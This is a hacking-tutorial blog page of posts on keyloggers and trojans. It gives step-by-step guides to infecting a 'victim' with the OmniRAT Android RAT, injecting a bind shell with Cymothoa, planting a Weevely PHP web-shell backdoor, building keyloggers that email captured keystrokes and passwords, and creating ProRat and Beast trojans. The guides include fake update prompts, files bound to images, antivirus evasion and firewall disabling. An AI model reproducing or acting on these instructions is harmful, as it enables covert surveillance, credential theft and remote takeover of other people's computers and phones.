Showing posts with label Keylogger and Trojan. Show all posts
Showing posts with label Keylogger and Trojan. Show all posts

Hack Android Devices using Omni RAT

OmniRAT is a brand new lightweight Remote Administration Tool for all versions (1.0 - 6.0) and devices that support Android. The Server is written in Java thus working on Windows, Linux and Mac. The Client is fully undetected by any Antivirus, persistent and stealth. It offers a lot of Features.

Activity Information                                                                                                              
You can retrieve detailed information about services and processes running on the client’s device.
App Widgets                                                                                                                                 
You can view the installed app widgets.
Audio Information                                                                                                 
You can retrieve detailed information about the client’s audio configuration.
Battery Information                                                                                                                               
 You can retrieve detailed information about the client’s battery configuration.
Bluetooth Information                                                                                                
You can retrieve detailed information about the client’s Bluetooth configuration.
Call Information                                                                                                                                 
 You can retrieve detailed information about the client’s call logs.
Camera Information                                                                                                                  
You can retrieve detailed information about the client’s camera configuration.
Configuration Information                                                                                                     
 You can retrieve detailed information about miscellaneous configurations.
Connectivity Information                                                                                                                       
You can retrieve detailed information about the client’s connectivity configuration.
Contacts Information                                                                                                                        
You can retrieve detailed information about the client’s contacts.
Display Information                                                                                                      
 You can retrieve detailed information about the client’s display configuration.
Features Information                                                                                                
You can retrieve the installed features on the client’s device.
Installed Apps Information                                                                                                   
You can retrieve the installed apps on the client’s device.
Location Information                                                                                                                    
You can retrieve detailed information about the client’s location.
Memory Information                                                                                                                 
You can retrieve detailed information about the client’s memory.
System Information                                                                                                                  
You can retrieve detailed information about the client’s system.
Telephony Information                                                                                                                                  
You can retrieve detailed information about the client’s telephony configuration.
WiFi Information                                                                                                                                          
You can retrieve detailed information about the client’s WiFi configuration.
Hidden and Persistent                                                                                               
OmniRAT does not show up in the client’s launcher nor in the task manager. It starts on each boot.
Small Client                                                                                                                            
 The OmniRAT apk is only 100kb small!
Account Manager                                                                                                                                                 
You can view and manage all available accounts on the client’s device.
Audio Manager                                                                                                                              
 You can manage the client’s audio (e.g. adjust volume or play sounds, etc.).
Bluetooth Manager                                                                                                                        
You can manage the clients Bluetooth (e.g. discover nearby devices, get a list of the bonded devices, etc.).
Browser Manager                                                                                                                                                     
You can view and delete the client’s browser history, bookmarks and searches.
Call Manager                                                                                                                                
You can make calls to any number and end running calls.
Clipboard Manager                                                                                                                     
 You can view and set the clients clipboard.
Download Manager                                                                                                                  
You can download files from the internet through the android Download Manager.
File Manager                                                                                                                                        
You can access, rename, delete, download files and folders of the clients file system. You can also upload files and create new directories.
Notification Manager                                                                                                                                                                  You can send advanced notifications to the client.
Sensor Manager                                                                                                                                   
 You can view the available sensors and their data.
SMS Manager                                                                                                                                             
 You can view, delete and send SMS.
UiMode Manager                                                                                                                                   
You can view and set different modes (e.g. night mode, car mode).
Vibration Manager                                                                                                                     
You can vibrate the client’s device.
Wallpaper Manager                                                                                                                                 
You can view, delete and set the clients wallpaper.
WiFi Manager                                                                                                                                    
You can view the configured WiFi networks; you can retrieve the WiFi scan results and you can enable / disable the clients WiFi.
Record Microphone                                                                                                                                        
You can record the client’s microphone.
Text to Speech                                                                                                                                                
 You can speak text on the client’s device.
Toast                                                                                                                                                                          
You can toast messages on the client’s device.
No root required                                                                                                                                                  
OmniRAT does not need root permissions in order to work.
Completely FUD                                                                                                                                                  
OmniRAT is completely FUD.

In order to use OmniRAT, you need to buy it here and install it on your pc.

Now it will ask you accept the terms of service; select the check box and click on continue


Specify a port and then start listening.

You will be prompted to allow the connection.


Now send .Apk file to the victim Android, which will display a message to update the existing application.


When victim will click on all and install option. It will show a message “App installed”.


When victim will click on done .It will show a error message 505 i.e. Device is not compatible.
Victim will click on Close.


Now OmniRat will get the control of the victim Android .


Now Right click on Galaxy Alpha and click on Information Gathering Option. It will show a list of activities to get complete information about the various activities performed on that Android.


To get the information about Battery , Click on Battery Option.

To see the call Record, Select the option Calls. It will display the complete information about the calls .


 Use call manager, to make a call.


Click on Contact Information, it will show the list of all the contact details.


Click on Managers, It will show a list of option, select any options


Click on Others Option , to  record microphone or capture live SMS etc.

Cymothoa - Runtime shellcode injection, for stealthy backdoors

Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. But keep in mind it’s a runtime injector so it only works on applications that are already running.

Open your backtrack terminal and type cd /pentest/backdoors/cymothoa
Not type. /cymothoa

The main syntax is: /cymothoa –p -s [options]



Now type. /cymothoa –S for list of all available shellcodes


To try to infect a currently running process I run to see a list of life processes type ps –aux



I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444

-p  
process ID  1510
-s
shell code number 0 bind /bin/sh to the provided port (requires -y)
-4444
that will open up a shell on port 4444

You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.


Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)

How to Create a Backdoor in Server using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.

Open your backtrack terminal and type cd /pentest/backdoors/web/weevely



Now type ./weevely.py generate .It will look something like this

. / weevely.py generate rajchandel (Password) /root/Desktop


Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py .It will look something like this

. / weevely http://telecallerjobs.com/webdoor.php rajchandel


Uname –a – print all information
Free – display information about free and used memory on the system
pwd - print name of current/working directory
Df – displays the amount of disk space available on the filesystem containing each file name argument
W – Displays information about the users currently on the machine, and their processes


Ls – List information about the FILEs (the current directory by default)

How to Hack Gmail Facebook using FUD Keylogger

First Download Project Neptune Keylogger
Open the program 
Double click on the program where you downloaded it.




First check the button that says "Use Email for Storing Logs" Then change the amount of time the Keylogger sends logs.

In the Email settings tab keep the "smpt.gmail.com” and the port number 587 where it says "Email to Send Keystroke Logs" put your email in that box and in the box under that put the password to your email.

If you want you can change what email it send the logs too, but otherwise use the same email that you put above. 

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step.  


Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them ---this means that the sites can’t scan the tool for virus.


Go to the installation tab and check the first box in "Startup Settings" Then Choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the "AppData Folder
Then go to Original File Check "Do Nothing with Original File after Install" to keep suspicion level none.
If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.


Now go to 'Server Creation' tab and press 'Generate New Server' under 'server creation', and give name of your Keylogger and that it... You are done




You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via email.

How to Hack Gmail Account

First Download Rin Logger from http://goo.gl/ruV2J
Run the keylogger file on your pc and click on “Create new


Now, enter the information as follows:

Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address

Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit "verify now” If you get a message saying verified, your good to go, click next


Now enable the “Install Keylogger” by clicking on it.
Name the file anything you want and select Installation path as “Application Data”, click next


Click on Next


Now, “Enable Website Viewer” by clicking on it.
Click on Next option


Now, Enable the “Enable File Binder”
Click on next.


Now Enable the “Steal Password
Click on Next


Fill all the information by yourself. And click on next.Fill all the information by yourself. And click on next.



Now, hit on “Save As” and select the location where you want to save your keylogger server file.
And click on “Compile Server”. Now Compile has been done


You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

Hacking with Prorat Trojan

  • Download Prorat.exe
  • Open prorat.exe that you have downloaded.

Click on Create  and then Create ProRat Server


Enter your host name or IP in the ProRat Notification If you don’t know you IP address click the red arrow and It will fill you IP address automatically.

Now open Notifications at the sidebar and select the second option “Mail Notifications” Change this to the your email address where you want to receive notifications when the server is installed into your victims computer.


Click on Bind with file on the sidebar. You can bind it with a text document or Image File.


Now Click on server Icon and choose the desired icon and click on Create server.



The server gets installed silently in the computer background and the hacker will be sent a notification to the email address he described in the notification tab whenever the victim is infectedhackingarticles.in/trojans/ProRat.zip

How to use Beast Trojan

Step 1:- Download the necessary software  Beast 2.06

Step 2:- Open the software


Step 3:- Now click on “Build server “button.


Step 4:- Now in this window click on the notifications tab.
Step 5:- In the notifications tab click on the e-mail button.
Step 6:- Now In this window fill your proper and valid email id


Step 7:- Now go to "AV-FW kill” tab.


Step 8: - Now In this put a tick mark on the “disable XP firewall ".


Step 9:-Now click on "EXE icon” tab.


 Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.



Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot


Step 14:- After That Click on the "Go Beast” Button and You will be connected to victims PC.


Step 15:- Now select the action or task you want to execute on victims PC form the given list.

Step 16:- Now to destroy or kill the Trojan click on the “server “tab from the menu.

Step 17:-Now click on the “Kill Server “button and the Trojan will be destroyed from the victims PC.

 Step 18:- You are Done Now.